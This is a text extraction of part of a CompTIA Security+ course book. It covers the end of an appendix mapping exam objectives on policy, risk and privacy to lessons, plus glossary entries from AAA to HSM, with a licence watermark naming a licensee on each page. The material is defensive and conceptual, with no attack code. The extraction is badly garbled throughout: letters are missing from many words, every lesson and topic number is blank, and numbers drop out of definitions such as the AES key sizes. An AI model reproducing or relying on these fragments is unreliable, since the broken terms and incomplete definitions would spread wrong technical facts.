perational Lesson , Topic
Technical Lesson , Topic
Control type Lesson , Topic
reventative Lesson , Topic
Detective Lesson , Topic
Corrective Lesson , Topic
Deterrent Lesson , Topic
Compensating Lesson , Topic
hysical Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-30 | Appendix A

Domain and Objective Covered in

plain the importance o applica le re ulations Lesson , Topic
standards or rame or s that impact or ani ational
securit posture
egulations, standards, and legislation Lesson , Topic
eneral Data rotection egulation D Lesson , Topic
National, territory, or state laws Lesson , Topic
ayment Card Industry Data ecurity tandard CI D Lesson , Topic
ey frameworks Lesson , Topic
Center for Internet ecurity CI Lesson , Topic
National Institute of tandards and Technology NI T Lesson , Topic
M C
International rgani ation for tandardi ation I Lesson , Topic

A C Type I II Lesson , Topic

Cloud security alliance Lesson , Topic
Cloud control matri Lesson , Topic
eference architecture Lesson , Topic
enchmarks secure configuration guides Lesson , Topic
latform vendor specific guides Lesson , Topic
eb server Lesson , Topic
Lesson , Topic
Application server Lesson , Topic
Network infrastructure devices Lesson , Topic
plain the importance o policies to or ani ational Lesson , Topic A
securit Lesson , Topic D
Lesson , Topic A
Lesson , Topic A
Lesson , Topic C
ersonnel Lesson , Topic A
Lesson , Topic D
Acceptable use policy Lesson , Topic D
Job rotation Lesson , Topic A
Mandatory vacation Lesson , Topic A
eparation of duties Lesson , Topic A
Least privilege Lesson , Topic A
Clean desk space Lesson , Topic D
ackground checks Lesson , Topic A
Non disclosure agreement NDA Lesson , Topic A
ocial media analysis Lesson , Topic D
nboarding Lesson , Topic A
boarding Lesson , Topic A
ser training Lesson , Topic D
amification Lesson , Topic D

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-31

Domain and Objective Covered in

Capture the ag Lesson , Topic D
hishing campaigns Lesson , Topic D
hishing simulations Lesson , Topic D
Computer based training C T Lesson , Topic D
ole based training Lesson , Topic D
Diversity of training techni ues Lesson , Topic D
Third party risk management Lesson , Topic A
endors Lesson , Topic A
upply chain Lesson , Topic A
usiness partners Lesson , Topic A
ervice level agreement LA Lesson , Topic A
Memorandum of understanding M Lesson , Topic A
Master services agreement M A Lesson , Topic A
usiness partnership agreement A Lesson , Topic A
nd of life L Lesson , Topic A
nd of service life L Lesson , Topic A
NDA Lesson , Topic A
Data Lesson , Topic A
Classification Lesson , Topic A
overnance Lesson , Topic A
etention Lesson , Topic A
Credential policies Lesson , Topic A
ersonnel Lesson , Topic A
Third party Lesson , Topic A
Devices Lesson , Topic A
ervice accounts Lesson , Topic A
Administrator root accounts Lesson , Topic A
rgani ational policies Lesson , Topic C
Change management Lesson , Topic C
Change control Lesson , Topic C
Asset management Lesson , Topic C
ummari e ris mana ement processes and concepts Lesson , Topic A
Lesson , Topic
isk types Lesson , Topic A
ternal Lesson , Topic A
Internal Lesson , Topic A
Legacy systems Lesson , Topic A
Multiparty Lesson , Topic A
I theft Lesson , Topic A
oftware compliance licensing Lesson , Topic A
isk management strategies Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-32 | Appendix A

Domain and Objective Covered in

Acceptance Lesson , Topic A
Avoidance Lesson , Topic A
Transference Lesson , Topic A
Cybersecurity insurance Lesson , Topic A
Mitigation Lesson , Topic A
isk analysis Lesson , Topic A
isk register Lesson , Topic A
isk matri heat map Lesson , Topic A
isk control assessment Lesson , Topic A
isk control self assessment Lesson , Topic A
isk awareness Lesson , Topic A
Inherent risk Lesson , Topic A
esidual risk Lesson , Topic A
Control risk Lesson , Topic A
isk appetite Lesson , Topic A
egulations that a ect risk posture Lesson , Topic A
isk assessment types Lesson , Topic A
ualitative Lesson , Topic A
uantitative Lesson , Topic A
Likelihood of occurrence Lesson , Topic A
Impact Lesson , Topic A
Asset value Lesson , Topic A
ingle loss e pectancy L Lesson , Topic A
Annuali ed loss e pectancy AL Lesson , Topic A
Annuali ed rate of occurrence A Lesson , Topic A
Disasters Lesson , Topic
nvironmental Lesson , Topic
erson made Lesson , Topic
Internal vs. e ternal Lesson , Topic
usiness impact analysis Lesson , Topic
ecovery time ob ective T Lesson , Topic
ecovery point ob ective Lesson , Topic
Mean time to repair MTT Lesson , Topic
Mean time between failures MT Lesson , Topic
unctional recovery plans Lesson , Topic
ingle point of failure Lesson , Topic
Disaster recovery plan D Lesson , Topic
Mission essential functions Lesson , Topic
Identification of critical systems Lesson , Topic
ite risk assessment Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-33

Domain and Objective Covered in

plain pri ac and sensiti e data concepts in relation Lesson , Topic A
to securit Lesson , Topic
rgani ational conse uences of privacy and data breaches Lesson , Topic A
eputation damage Lesson , Topic A
Identity theft Lesson , Topic A
ines Lesson , Topic A
I theft Lesson , Topic A
Notifications of breaches Lesson , Topic A
scalation Lesson , Topic A
ublic notifications and disclosures Lesson , Topic A
Data types Lesson , Topic A
Classifications Lesson , Topic A
ublic Lesson , Topic A
rivate Lesson , Topic A
ensitive Lesson , Topic A
Confidential Lesson , Topic A
Critical Lesson , Topic A
roprietary Lesson , Topic A
ersonally identifiable information II Lesson , Topic A
ealth information Lesson , Topic A
inancial information Lesson , Topic A
overnment data Lesson , Topic A
Customer data Lesson , Topic A
rivacy enhancing technologies Lesson , Topic
Data minimi ation Lesson , Topic
Data masking Lesson , Topic
Tokeni ation Lesson , Topic
Anonymi ation Lesson , Topic
seudo anonymi ation Lesson , Topic
oles and responsibilities Lesson , Topic A
Data owners Lesson , Topic A
Data controller Lesson , Topic A
Data processor Lesson , Topic A
Data custodian steward Lesson , Topic A
Data protection officer D Lesson , Topic A
Information life cycle Lesson , Topic A
Impact assessment Lesson , Topic A
Terms of agreement Lesson , Topic A
rivacy notice Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Glossary
AAA (authentication, authorization,
and accounting) A security concept
where a centrali ed platform verifies
sub ect identification, ensures the sub ect
is assigned relevant permissions, and
then logs these actions to create an audit
trail.
ABAC (attribute-based access control)
An access control technique that
evaluates a set of attributes that each
subject possesses to determine if access
should be granted.
account policies A set of rules governing
user security information, such as
password e piration and uni ueness,
which can be set globally.
ACL (Access Control List) A collection
of access control entries (ACEs) that
determines which sub ects user accounts,
host I addresses, and so on are allowed
or denied access to the object and the
privileges given read only, read write, and
so on).
active defense The practice of
responding to a threat by destroying or
deceiving a threat actor's capabilities.
adversarial AI ad ersarial artificial
intelligence) Using AI to identify
vulnerabilities and attack vectors to
circumvent security systems.
AES (Advanced Encryption Standard)
A symmetric , , or bit block
cipher based on the Rijndael algorithm
developed by Belgian cryptographers Joan
Daemen and Vincent Rijmen and adopted
by the U.S. government as its encryption
standard to replace DES.
Agile model (Agile) A software
development model that focuses on
iterative and incremental development
to account for evolving requirements and
expectations.
AH (authentication header) An IPSec
protocol that provides authentication for the
origin of transmitted data as well as integrity
and protection against replay attacks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
air gap A type of network isolation that
physically separates a network from all
other networks.
AIS (Automated Indicator Sharing)
Threat intelligence data feed operated by
the D .
ALE (annual loss expectancy) The
total cost of a risk to an organization on
an annual basis. This is determined by
multiplying the SLE by the annual rate of
occurrence (ARO).
AP (access point) A device that provides
a connection between wireless devices
and can connect to wired networks. Also
known as wireless access point or WAP.
API (application programming
interface) A library of programming
utilities used, for e ample, to enable
software developers to access functions
of the TC I network stack under a
particular operating system.
application a are fire all A Layer 7
firewall technology that inspects packets
at the Application layer of the OSI model.
application fire all Software designed
to run on a server to protect a particular
application such as a web server or SQL
server.
APT (advanced persistent threat) An
attacker's ability to obtain, maintain, and
diversify access to network systems using
exploits and malware.
Arduino Open-source platform producing
programmable circuit boards for
education and industrial prototyping.
ARO (annual rate of occurrence) In
risk calculation, an e pression of the
probability likelihood of a risk as the
number of times per year a particular loss
is expected to occur.
ARP inspection An optional security
feature of a switch that prevents excessive
A replies from ooding a network
segment.
 G-2 | Glossary
A poisonin A spoofin A
network-based attack where an attacker
with access to the target local network
segment redirects an IP address to the
MAC address of a computer that is not
the intended recipient. This can be used
to perform a variety of attacks, including
Do , spoofing, and Man in the Middle.
asymmetric algorithm (Public Key) A
cipher that uses public and private keys.
The keys are mathematically linked,
using either ivel, hamir, Adleman
(RSA) or elliptic curve cryptography
CC algorithms, but the private key
is not derivable from the public one.
An asymmetric key cannot reverse the
operation it performs, so the public key
cannot decrypt what it has encrypted,
for example. Also known as Elliptic Curve
Cryptography or ECC.
ATT&CK (Adversarial Tactics,
Techniques, and Common Knowledge)
A knowledge base maintained by the
MITRE Corporation for listing and
e plaining specific adversary tactics,
techni ues, and procedures.
attack surface The points at which a
network or application receives external
connections or inputs outputs that are
potential vectors to be exploited by a
threat actor.
attack vector A specific path by which a
threat actor gains unauthorized access to
a system. Also known as vector.
authenticator A PNAC switch or router
that activates EAPoL and passes a
supplicant's authentication data to an
authenticating server, such as a ADI
server.
automation Using scripts and APIs
to provision and deprovision systems
without manual intervention.
Autopsy The Sleuth Kit is an open
source collection of command line and
programming libraries for disk imaging
and file analysis. Autopsy is a graphical
frontend for these tools and also provides
a case management work ow tool. Also
known as Sleuth Kit.
availability The fundamental security
goal of ensuring that computer systems
operate continuously and that authorized
persons can access data that they need.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
BAS (building automation system)
Components and protocols that facilitate
the centrali ed configuration and
monitoring of mechanical and electrical
systems within offices and data centers.
baseband radio The chip and firmware
in a smartphone that acts as a cellular
modem.
aseline confi uration A collection of
security and configuration settings that
are to be applied to a particular system or
network in the organization.
bash (Bourne again shell) A command
shell and scripting language for Unix-like
systems. bastion host A server typically
found in a DM that is configured to
provide a single service to reduce the
possibility of compromise.
behavioral analysis A network
monitoring system that detects changes
in normal operating data sequences
and identifies abnormal se uences. Also
known as behavior-based detection.
BIA (business impact analysis) A
systematic activity that identifies
organizational risks and determines
their e ect on ongoing, mission critical
operations.
birthday attack A type of password
attack that exploits weaknesses in the
mathematical algorithms used to encrypt
passwords, in order to take advantage
of the probability of di erent password
inputs producing the same encrypted
output.
block cipher A type of symmetric
encryption that encrypts data one block at
a time, often in bit blocks. It is usually
more secure, but is also slower, than
stream ciphers.
blockchain A concept in which an
expanding list of transactional records
listed in a public ledger is secured using
cryptography.
blue team The defensive team in a
penetration test or incident response
exercise.
bluejacking Sending an unsolicited
message or picture message using a
Bluetooth connection.

luesnarfin A wireless attack where an
attacker gains access to unauthorized
information on a device using a Bluetooth
connection.
boot attestation Report of boot state
integrity data that is signed by a tamper-
proof TPM key and reported to a network
server.
botnet A set of hosts that has been
infected by a control program called a bot
that enables attackers to exploit the hosts
to mount attacks. Also known as zombie.
BPA (business partnership agreement)
Agreement by two companies to work
together closely, such as the partner
agreements that large IT companies set
up with resellers and solution providers.
BPDU guard (Bridge Protocol Data
Unit guard) Switch port security feature
that disables the port if it receives BPDU
notifications related to spanning tree.
This is configured on access ports where
there any BPDU frames are likely to be
malicious.
brute force attack A type of password
attack where an attacker uses an
application to exhaustively try every
possible alphanumeric combination to
crack encrypted passwords.
u er o er o An attack in which data
goes past the boundary of the destination
bu er and begins to corrupt ad acent
memory. This can allow the attacker to
crash the system or execute arbitrary
code.
bug bounty Reward scheme operated by
software and web services vendors for
reporting vulnerabilities.
BYOD (bring your own device) Security
framework and tools to facilitate use
of personally-owned devices to access
corporate networks and data.
C&C (command and control) An
infrastructure of hosts and services with
which attackers direct, distribute, and
control malware over botnets. Also known
as C2.
CA certificate authorit A server that
guarantees subject identities by issuing
signed digital certificate wrappers for their
public keys.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-3
cable lock Devices can be physically
secured against theft using cable ties
and padlocks. Some systems also feature
lockable faceplates, preventing access to
the power switch and removable drives.
CAC (common access card) A smart
card that provides certificate based
authentication and supports two-factor
authentication. A CAC is produced for
Department of Defense employees and
contractors in response to a omeland
Security Directive.
CAN bus (controller area network
bus) A serial network designed to allow
communications between embedded
programmable logic controllers.
CAPTCHA (completely automated
public turing test to tell computers
and humans apart) An image of text
characters or audio of some speech that
is difficult for a computer to interpret.
CA TC As are used for purposes such as
preventing bots from creating accounts
on web forums and social media sites to
spam them.
captive portal A web page or website to
which a client is redirected before being
granted full network access.
capture the a Training event where
learners must identify a token within a live
network environment.
card cloning/skimming Duplicating a
smart card by reading (skimming) the
confidential data stored on it. Also known
as skimming.
carving The process of extracting data
from a computer when that data has no
associated file system metadata.
CASB (cloud access security broker)
Enterprise management software
designed to mediate access to cloud
services by users across all types of
devices.
cat command Linux command to view
and combine concatenate files.
CBC (cipher block chaining) An
encryption mode of operation where an
e clusive or is applied to the first
plaintext block
Glossary
 G-4 | Glossary

CCMP (counter mode with cipher block
chaining message authentication code
protocol) An encryption protocol used
for wireless LANs that addresses the
vulnerabilities of the WEP protocol.
CE (cryptographic erase) A method
of sanitizing a self-encrypting drive by
erasing the media encryption key.
chain of custody The record of evidence
history from collection, to presentation in
court, to disposal.
change control The process by which
the need for change is recorded and
approved.
change management The process
through which changes to the
configuration of information systems are
implemented, as part of the organi ation's
overall configuration management e orts.
CHAP (Challenge Handshake
Authentication Protocol) Authentication
scheme developed for dial-up networks
that uses an encrypted three-way
handshake to authenticate the client
to the server. The challenge-response
is repeated throughout the connection
(though transparently to the user) to
guard against replay attacks.
checksum The output of a hash function.
chmod Linu command for managing file
permissions.
CIA triad confidentialit inte rit
and availability) The three principles of
security control and management. Also
known as the information security triad.
or AIC triad.
circuit le el state ul inspection fire all
A Layer firewall technology that tracks
the active state of a connection, and can
make decisions based on the contents of
network traffic as it relates to the state of
the connection.
CIS (Center for Internet Security) A not-
for profit organi ation founded partly by
SANS). It publishes the well-known "Top
20 Critical Security Controls" (or system
design recommendations .
clean desk policy An organizational
policy that mandates employee work
areas be free from potentially sensitive
information; sensitive documents must
not be left out where unauthorized
personnel might see them.
cloud deployment model Classifying the
ownership and management of a cloud as
public, private, community, or hybrid.
Cloud Security Alliance Industry
body providing security guidance to
C s, including enterprise reference
architecture and security controls matrix.
cloud service model Classifying the
provision of cloud services and the limit of
the cloud service provider's responsibility
as software, platform, infrastructure,
and so on. clustering A load balancing
technique where a group of servers are
configured as a unit and work together to
provide network services.
CN (common name) An attribute
e pressing a host or user name, also
used as the sub ect identifier for a digital
certificate.
COBO (corporate owned, business only)
Enterprise mobile device provisioning
model where the device is the property
of the organization and personal use is
prohibited.
code of conduct Professional behavior
depends on basic ethical standards,
such as honesty and fairness. Some
professions may have developed codes of
ethics to cover difficult situations some
businesses may also have a code of ethics
to communicate the values it expects its
employees to practice. Also known as
ethics.
code reuse Potentially unsecure
programming practice of using code
originally written for a di erent conte t.
code signing The method of using a
digital signature to ensure the source and
integrity of programming code.
cold site A predetermined alternate
location where a network can be rebuilt
after a disaster.
collector A network appliance that
gathers or receives log and or state data
from other network systems.
collision In cryptography, the act of two
di erent plainte t inputs producing the
same exact ciphertext output.
community cloud A cloud that is
deployed for shared use by cooperating
tenants.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

compensating control A security
measure that takes on risk mitigation
when a primary control fails or cannot
completely meet expectations.
confidentialit The fundamental
security goal of keeping information and
communications private and protecting
them from unauthorized access.
containerization A type of virtualization
applied by a host operating system
to provision an isolated execution
environment for an application.
content filter A software application or
gateway that filters client re uests for
various types of internet content web,
T , IM, and so on .
context-aware authentication An access
control scheme that verifies an ob ect's
identity based on various environmental
factors, like time, location, and behavior.
continuous delivery Software
development method in which app and
platform requirements are frequently
tested and validated for immediate
availability.
continuous deployment Software
development method in which app and
platform updates are committed to
production rapidly.
continuous integration Software
development method in which code
updates are tested and committed to
a development or build server code
repository rapidly.
continuous monitoring The technique
of constantly evaluating an environment
for changes so that new risks may be
more quickly detected and business
operations improved upon. Also known as
continuous security monitoring or CSM.
control risk Risk that arises when a
control does not provide the level of
mitigation that was expected.
COPE (corporate owned, personally
enabled) Enterprise mobile device
provisioning model where the device
remains the property of the organi ation,
but certain personal use, such as private
email, social networking, and web
browsing, is permitted.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-5
corrective control A type of security
control that acts after an incident
to eliminate or minimize its impact.
correlation Function of log analysis that
links log and state data to identify a
pattern that should be logged or alerted
as an event.
counter mode (CTM) An encryption
mode of operation where a numerical
counter value is used to create a
constantly changing IV. Also referred to
as CTM (counter mode) and CM (counter
mode).
credential stu n Brute force attack
in which stolen user account names and
passwords are tested against multiple
websites.
C certificate re ocation list A list of
certificates that were revoked before their
expiration date.
crossover error rate Biometric
evaluation factor expressing the point at
which A and meet, with a low value
indicating better performance.
CSP (cloud service provider) A vendor
o ering public cloud service models, such
as aa , Iaa , or aa .
C certificate si nin re uest A
ase A CII file that a sub ect sends to a
CA to get a certificate.
CTI (cyber threat intelligence) The
process of investigating, collecting,
analy ing, and disseminating information
about emerging threats and threat
sources. Also known as threat intelligence.
Cuckoo Implementation of a sandbox for
malware analysis.
curl command Utility for command-line
manipulation of URL-based protocol
requests.
CVE (Common Vulnerabilities and
Exposures) Scheme for identifying
vulnerabilities developed by MITRE and
adopted by NIST.
CVSS (Common Vulnerability Scoring
System) A risk management approach to
quantifying vulnerability data and then
taking into account the degree of risk to
di erent types of systems or information.
Glossary
 G-6 | Glossary
CYOD (choose your own device)
Enterprise mobile device provisioning
model where employees are o ered a
selection of corporate devices for work
and, optionally, private use.
DAC (discretionary access control)
Access control model where each
resource is protected by an Access
Control List (ACL) managed by the
resource's owner (or owners).
data at rest Information that is primarily
stored on specific media, rather than
moving from one medium to another.
data breach hen confidential or
private data is read, copied, or changed
without authorization. Data breach events
may have notification and reporting
requirements.
data controller In privacy regulations,
the entity that determines why and how
personal data is collected, stored, and used.
data custodian An individual who is
responsible for managing the system on
which data assets are stored, including
being responsible for enforcing access
control, encryption, and backup recovery
measures.
data e filtration The process by which
an attacker takes data that is stored inside
of a private network and moves it to an
external network.
data exposure A software vulnerability
where an attacker is able to circumvent
access controls and retrieve confidential
or sensitive data from the file system or
database.
data governance The overall
management of the availability, usability,
and security of the information used in an
organization.
data in processing Information that is
present in the volatile memory of a host,
such as system memory or cache.
data in transit Information that is being
transmitted between two hosts, such as
over a private network or the Internet.
Also known as data in motion.
data masking A deidentification method
where generic or placeholder labels are
substituted for real data while preserving
the structure or format of the original
data.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
data minimization In data protection,
the principle that only necessary and
sufficient personal information can be
collected and processed for the stated
purpose.
data owner A senior (executive) role with
ultimate responsibility for maintaining the
confidentiality, integrity, and availability of
an information asset.
data processor In privacy regulations, an
entity trusted with a copy of personal data
to perform storage and or analysis on
behalf of the data collector.
data remnant Leftover information on a
storage medium even after basic attempts
have been made to remove that data.
Also known as remnant.
data sovereignty In data protection,
the principle that countries and states
may impose individual requirements
on data collected or stored within their
jurisdiction.
data steward An individual who is
primarily responsible for data uality,
ensuring data is labeled and identified
with appropriate metadata and that data
is collected and stored in a format and
with values that comply with applicable
laws and regulations.
DCHP snooping A configuration option
that enables a switch to inspect D C
traffic to prevent MAC spoofing.
dd command Linux command that makes
a bit by bit copy of an input file, typically
used for disk imaging.
DDoS attack (distributed denial of
service attack) An attack that uses
multiple compromised hosts (a botnet)
to overwhelm a service with request or
response traffic.
dead code Code in an application that is
redundant because it will never be called
within the logic of the program ow.
deauthentication/disassociation
poofing frames to disconnect a wireless
station to try to obtain authentication
data to crack.
deception and disruption Cybersecurity
resilience tools and techniques to
increase the cost of attack planning for
the threat actor.

default account Default administrative
and guest accounts configured on servers
and network devices are possible points
of unauthorized access.
defense in depth A security strategy that
positions the layers of network security
as network traffic roadblocks each layer
is intended to slow an attack's progress,
rather than eliminating it outright.
degaussing The process of rendering
a storage drive inoperable and its data
unrecoverable by eliminating the drive's
magnetic charge.
deidentification In data protection,
methods and technologies that remove
identifying information from data before
it is distributed.
deprovisioning The process of removing
an application from packages or
instances.
DER (distinguished encoding rules)
The binary format used to structure the
information in a digital certificate.
detective control A type of security
control that acts during an incident to
identify or record that it is happening.
deterrent control A type of security
control that discourages intrusion
attempts.
i e ellman A cryptographic
technique that provides secure key
exchange.
C spoofin namic ost
Confi uration rotocol spoofin An
attack in which an attacker responds to
a client requesting address assignment
from a D C server.
Diamond Model A framework for
analyzing cybersecurity incidents.
dictionary attack A type of password
attack that compares encrypted
passwords against a predetermined list of
possible password values.
di erential ac up A backup type in
which all selected files that have changed
since the last full backup are backed up.
i er The Di erentiated ervices Code
oint D C field is used to indicate a
priority value for a layer 3 (IP) packet to
facilitate Quality of Service (QoS) or Class
of Service (CoS) scheduling.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-7
digital signature A message digest
encrypted using the sender's private
key that is appended to a message to
authenticate the sender and prove
message integrity.
directory service A network service that
stores identity information about all the
ob ects in a particular network, including
users, groups, servers, client computers,
and printers.
directory traversal An application attack
that allows access to commands, files,
and directories that may or may not be
connected to the web document root
directory.
diversity Cybersecurity resilience strategy
that increases attack costs by provisioning
multiple types of controls, technologies,
vendors, and crypto implementations.
DLP (data loss/leak prevention) A
software solution that detects and
prevents sensitive information from
being stored on unauthorized systems or
transmitted over unauthorized networks.
DMZ (demilitarized zone) A segment
isolated from the rest of a private network
by one or more firewalls that accepts
connections from the Internet over
designated ports.
DNAT (destination network address
translation) NAT service where private
internal addresses are mapped to one
or more public addresses to facilitate
Internet connectivity for hosts on a local
network via a router.
DNS hijacking (Domain Name System
hijacking) An attack in which an attacker
modifies a computer's DN configurations
to point to a malicious DNS server.
DNS poisoning (Domain Name System
poisoning) A network-based attack where
an attacker exploits the traditionally open
nature of the DNS system to redirect a
domain name to an IP address of the
attacker's choosing.
DNSSEC (Domain Name System
Security Extensions) A security protocol
that provides authentication of DNS data
and upholds DNS data integrity.
Glossary
 G-8 | Glossary
domain hijacking A type of hijacking
attack where the attacker steals a
domain name by altering its registration
information and then transferring
the domain name to another entity.
Sometimes referred to as brandjacking.
DoS attack (denial of service attack)
Any type of physical, application, or
network attack that a ects the availability
of a managed resource.
downgrade attack A cryptographic attack
where the attacker exploits the need for
backward compatibility to force a computer
system to abandon the use of encrypted
messages in favor of plaintext messages.
data pri ac o cer Institutional
data governance role with responsibility
for compliant collection and processing of
personal and sensitive data.
DRP (disaster recovery plan) A
documented and resourced plan showing
actions and responsibilities to be used in
response to critical incidents.
DSA (Digital Signature Algorithm) public
key encryption standard used for digital
signatures that provides authentication
and integrity verification for messages.
dump file File containing data captured
from system memory.
dumpster diving (Dumpster) The social
engineering technique of discovering
things about an organization (or person)
based on what it throws away.
EAP (Extensible Authentication
Protocol) Framework for negotiating
authentication methods that enables
systems to use hardware-based
identifiers, such as fingerprint scanners or
smart card readers, for authentication.
EAP-FAST (EAP Flexible Authentication
via Secure Tunneling) An EAP method
that is expected to address the
shortcomings of LEAP.
EAPoL (Extensible Authentication
Protocol over LAN) A port-based network
access control (PNAC) mechanism that
allows the use of EAP authentication when
a host connects to an Ethernet switch.
EAP-TLS (EAP Transport Layer Security)
An EAP method that requires server-
side and client side certificates for
authentication using L TL .
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
EAP-TTLS (EAP Tunneled Transport
Layer Security) An EAP method that
enables a client and server to establish a
secure connection without mandating a
client side certificate.
east est tra c Design paradigm
accounting for the fact that data center
traffic between servers is greater than
that passing in and out (north-south).
ECC (elliptic curve cryptography) An
asymmetric encryption algorithm that
leverages the algebraic structures of
elliptic curves over finite fields to derive
public private key pairs.
edge computing Provisioning processing
resource close to the network edge of IoT
devices to reduce latency.
e-discovery Procedures and tools to
collect, preserve, and analy e digital
evidence.
EDR (endpoint detection and response)
A software agent that collects system
data and logs for analysis by a monitoring
system to provide early detection of
threats.
EF (exposure factor) In risk calculation,
the percentage of an asset's value that
would be lost during a security incident or
disaster scenario.
elasticity The property by which a
computing environment can instantly
react to both increasing and decreasing
demands in workload.
entropy A measure of disorder.
Cryptographic systems should exhibit
high entropy to better resist brute force
attacks.
EOL (end of life) Product life cycle phase
where sales are discontinued and support
options reduced over time.
EOSL (end of service life) Product life
cycle phase where support is no longer
available from the vendor.
EPP (endpoint protection platform) A
software agent and monitoring system
that performs multiple security tasks.
ERM (enterprise risk management) The
comprehensive process of evaluating,
measuring, and mitigating the many risks
that pervade an organization.

error handling Coding methods to
anticipate and deal with exceptions
thrown during execution of a process.
escrow In key management, the storage
of a backup key with a third party.
ESP (Encapsulating Security Protocol)
IPSec sub-protocol that enables
encryption and authentication of the
header and payload of a data packet.
evil twin A wireless access point that
deceives users into believing that it is a
legitimate network access point.
execution control The process of
determining what additional software
may be installed on a client or server
beyond its baseline to prevent the use of
unauthorized software.
exploitation framework Suite of tools
designed to automate delivery of exploits
against common software and firmware
vulnerabilities.
extranet A private network that
provides some access to outside parties,
particularly vendors, partners, and select
customers.
failover A technique that ensures
a redundant component, device, or
application can uickly and efficiently take
over the functionality of an asset that has
failed.
fake telemetry Deception strategy that
returns spoofed data in response to
network probes.
false negative In security scanning, a
case that is not reported when it should
be.
false positive In security scanning, a case
that is reported when it should not be.
FAR (false acceptance rate) Biometric
assessment metric that measures the
number of unauthorized users who are
mistakenly allowed access.
Faraday cage A wire mesh container that
blocks e ternal electromagnetic fields
from entering into the container.
FC (Fibre Channel) igh speed network
communications protocol used to
implement SANs.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-9
FDE (full disk encryption) Encryption of
all data on a disk including system files,
temporary files, and the pagefile can be
accomplished via a supported , third
party software, or at the controller level
by the disk device itself.
federation A process that provides a
shared login capability across multiple
systems and enterprises. It essentially
connects the identity management
services of multiple systems.
I file inte rit monitorin A type
of software that reviews system files to
ensure that they have not been tampered
with.
fin erprint scanner Biometric
authentication device that can produce a
template signature of a user's fingerprint
then subsequently compare the template
to the digit submitted for authentication.
first responder The first e perienced
person or team to arrive at the scene of
an incident.
fog computing Provisioning processing
resource between the network edge of
IoT devices and the data center to reduce
latency.
A field pro ramma le ate arra
A processor that can be programmed to
perform a specific function by a customer
rather than at the time of manufacture.
FRR (false rejection rate) Biometric
assessment metric that measures the
number of valid subjects who are denied
access.
FTK (Forensic Toolkit) A commercial
digital forensics investigation
management and utilities suite, published
by AccessData.
FTPS A type of FTP using TLS for
confidentiality.
full backup A backup type in which all
selected files, regardless of prior state, are
backed up. full tunnel N configuration
where all traffic is routed via the N
gateway.
fuzzing A dynamic code analysis
technique that involves sending a running
application random and unusual input so
as to evaluate how the app responds.
Glossary
 G-10 | Glossary
gait analysis Biometric mechanism that
identifies a sub ect based on movement
pattern.
GCM (Galois/Counter Mode) A mode of
block chained encryption that provides
message authenticity for each block.
GDPR (General Data Protection
Regulation) Provisions and requirements
protecting the personal data of European
Union (EU) citizens. Transfers of personal
data outside the EU Single Market are
restricted unless protected by like-for-
like regulations, such as the 's rivacy
Shield requirements.
geofencing The practice of creating a
virtual boundary based on real-world
geography.
geolocation The identification or
estimation of the physical location of an
ob ect, such as a radar source, mobile
phone, or Internet connected computing
device.
GPO (Group Policy Object) On a
indows domain, a way to deploy per
user and per-computer settings such as
password policy, account restrictions,
firewall status, and so on.
grep command Linux command for
searching and filtering input. This can be
used as a file search tool when combined
with ls.
group account A group account is a
collection of user accounts that are
useful when establishing file permissions
and user rights because when many
individuals need the same level of access,
a group could be established containing
all the relevant users.
HA (high availability) The property that
defines how closely systems approach
the goal of providing data availability 100
percent of the time while maintaining a
high level of system performance.
hardening The process of making a
host or app configuration secure by
reducing its attack surface, through
running only necessary services, installing
monitoring software to protect against
malware and intrusions, and establishing
a maintenance schedule to ensure the
system is patched to be secure against
software exploits.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
hashcat Command-line tool used to
perform brute force and dictionary
attacks against password hashes.
hashing A function that converts an
arbitrary length string input to a fi ed
length string output. A cryptographic hash
function does this in a way that reduces
the chance of collisions, where two
di erent inputs produce the same output.
Also known as message digest.
head command Linux utility for showing
the first lines in a file.
heat map In a i i site survey, a diagram
showing signal strength at di erent
locations.
heuristic analysis (heuristic) A method
that uses feature comparisons and
likenesses rather than specific signature
matching to identify whether the target of
observation is malicious.
HMAC (hash-based message
authentication code) A method
used to verify both the integrity and
authenticity of a message by combining a
cryptographic hash of the message with a
secret key.
homomorphic encryption Method that
allows computation of certain fields in a
dataset without decrypting it.
honeypot (honeynet) A host, network,
or file set up with the purpose of luring
attackers away from assets of actual value
and or discovering attack strategies and
weaknesses in the security configuration.
Also known as honeyfile.
horizontal privilege escalation When
a user accesses or modifies specific
resources that they are not entitled to.
host ased fire all A software
application running on a single host and
designed to protect only that host. Also
known as personal firewall.
hot site A fully configured alternate
network that can be online quickly after a
disaster.
hot/cold aisle Arrangement of server
racks to ma imi e the efficiency of cooling
systems. Also known as cold hot aisle.

HOTP (HMAC-based One-time
Password) An algorithm that generates
a one-time password using a hash-
based authentication code to verify the
authenticity of the message.
HSM (hardware security module) An
appliance for generating and storing
cryptographic keys. This sort of solution
may be less susceptible to tampering
and insider threats than software-based
storage.
